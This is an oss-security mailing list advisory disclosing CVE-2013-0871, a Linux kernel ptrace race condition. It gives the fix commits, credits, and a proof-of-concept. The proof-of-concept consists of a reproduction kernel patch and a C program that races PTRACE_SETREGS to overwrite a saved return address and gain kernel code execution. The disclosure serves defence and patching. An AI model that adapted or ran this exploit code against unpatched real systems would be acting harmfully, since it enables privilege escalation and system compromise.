Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Fri, 15 Feb 2013 12:24:18 -0800
From: Julien Tinnes <julien@....org>
To: oss-security@...ts.openwall.com
Subject: Linux kernel race condition with PTRACE_SETREGS (CVE-2013-0871)

Linux kernel stack corruption due to race condition with PTRACE_SETREGS
-----------------------------------------------------------------------

A race conditon in ptrace can lead to kernel stack corruption and arbitrary
kernel-mode code execution.

This should be tracked as CVE-2013-0871.

Solution
------------

The following commits from Oleg Nesterov should address the issue:

- 910ffdb18a6408e14febbb6e4b6840fd2c928c82
- 9899d11f654474d2d54ea52ceaa2a1f4db3abd68
- 9067ac85d533651b98c2ff903182a20cbb361fcb

Credit
---------

This was discovered by Suleiman Souhlal and Salman Qazi of Google, with help
from Aaron Durbin and Michael Davidson, also of Google.

Code
--------

Salman Qazi provided the following PoC code:

Kernel patch for easy reproduction:

diff --git a/arch/x86/kernel/ptrace.c b/arch/x86/kernel/ptrace.c
index b629bbe..e22617e 100644
--- a/arch/x86/kernel/ptrace.c
+++ b/arch/x86/kernel/ptrace.c
@@ -24,6 +24,7 @@
 #include <linux/rcupdate.h>
 #include <linux/module.h>
 #include <linux/context_tracking.h>
+#include <linux/delay.h>

 #include <asm/uaccess.h>
 #include <asm/pgtable.h>
@@ -902,6 +903,12 @@ long arch_ptrace(struct task_struct *child, long request,
                                           datap);

        case PTRACE_SETREGS:    /* Set all gp regs in the child. */
+               if (!strcmp(current->comm, "ptrace_death")) {
+                       int i;
+                       WARN_ON_ONCE(1);
+                       for (i = 0 ; i < 15; i++)
+                               mdelay(10);
+               }
                return copy_regset_from_user(child,
                                             task_user_regset_view(current),
                                             REGSET_GENERAL,

source code for ptrace_death:


/*
 * Repro case for SETREGS arbitrary ring zero execution bug.
 *
 * The specific scenario that we attempt to create:
 *
 * V does a syscall.  It is being traced by P.  P
 * upon stopping V with PTRACE_SYSCALL and waiting for it, proceeds
 * to read its registers.  At this time P is asleep and an RT process S
 * starts running.
 *
 * Then P proceeds to write V's registers, at shortly it has done this
 * another process K kills V.  Process S goes to sleep permitting V
 * space to run.  V wakes up from its waiting state and heads for the exit.
 *  But, S quickly wakes up again by the time V has reached schedule().  V
 * is no longer running (since S has the CPU)
 *  and P modifies its regs.  When V finally starts running
 * and returns from schedule(), it pops an incorrect value from the
 * stack.  The reason is that the stack on which schedule() is called
 * does not have the final 6 registers in pt_regs on it.  That means that
 * when P modifies V's registers, it is actually overwriting the stack
 * frame saved for schedule(), including the return RIP.
 *
 * V and S and pinned to CPU 0.  S is an RT task so that it can control
 * when V does and doesn't run.
 * remaining processes are not allowed on 0.
 *
 */


#include <sched.h>
#include <sys/ptrace.h>
#include <sys/user.h>
#include <stdlib.h>
#include <stdio.h>
#include <assert.h>
#include <signal.h>

/* S */
int nuke_cpu(void)
{
        int pid0;
        int i;
        unsigned long mask = 1;

        pid0 = fork();
        if (!pid0) {
                struct sched_param p = {};
                p.sched_priority = sched_get_priority_min(SCHED_FIFO);
                assert(!sched_setscheduler(0, SCHED_FIFO, &p));
                assert(!sched_setaffinity(0, sizeof(mask), &mask));
                i = 0;
                usleep(120000);
                while(1) {
                        if (i == 50000) {
                                usleep(10);
                                printf("x");
                                fflush(stdout);
                        }
                        i++;
                }
        }

        return pid0;

}


int once()
{
        long i;
        int pid0;
        int pid;
        unsigned long mask = 1;
        struct user_regs_struct regs;
        assert(!sched_setaffinity(0, sizeof(mask), &mask));

        pid = fork();

        if (!pid) {
                /* V */
                while (1) {
                        /* Put our chosen RIP in callee saved registers */
                        asm __volatile__ (
                                "mov $0x1eadbeef, %%rbx\n"
                                "mov $0x1eadbeef, %%rbp\n"
                                "mov $0x1eadbeef, %%r12\n"
                                "mov $0x1eadbeef, %%r13\n"
                                "mov $0x1eadbeef, %%r14\n"
                                "mov $0x1eadbeef, %%r15\n"
                                "mov $0, %%rsi\n"
                                "mov $0, %%rdi\n"
                                "mov $0x6d, %%rax\n"
                                "syscall":::"rax","rsi","rdi",
                                                "r12", "rbx");

                }
        } else {
                /* P */
                assert(!ptrace(PTRACE_ATTACH, pid, 0, 0));
                wait(NULL);
                assert(!ptrace(PTRACE_SETOPTIONS, pid, NULL,
                        PTRACE_O_TRACESYSGOOD |
                        PTRACE_O_TRACEFORK |
                        PTRACE_O_TRACEVFORK |
                        PTRACE_O_TRACECLONE));
                while(1) {
                        int nuke_pid;
                        int pid2;
                        mask = 0xfffe;
                        assert(!sched_setaffinity(0, sizeof(mask), &mask));
                        /*Entry */
                        assert(!ptrace(PTRACE_SYSCALL, pid, NULL, 0, 0));
                        wait(NULL);
                        assert(!ptrace(PTRACE_GETREGS, pid, NULL, &regs));

                        nuke_pid = nuke_cpu();

                        regs.orig_rax = 0x3c;

                        pid2 = fork();
                        if (!pid2) {
                                /* K */
                                usleep(120000);
                                kill(pid, SIGKILL);
                                printf(".");
                                fflush(stdout);
                                exit(0);
                        }
                        printf("{");
                        fflush(stdout);
                        if (!ptrace(PTRACE_SETREGS, pid, NULL, &regs)) {
                                printf("+");
                        } else {
                                printf("-");
                        }

                        ptrace(PTRACE_CONT, pid, NULL, 0, SIGKILL);
                        kill(pid, SIGKILL);
                        kill(pid2, SIGKILL);
                        kill(nuke_pid, SIGKILL);
                        exit(0);
                }
        }
}

int main(void) {

        while (1) {
                int pid = fork();
                if (!pid) {
                        once();
                }
                wait(NULL);
        }
}

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.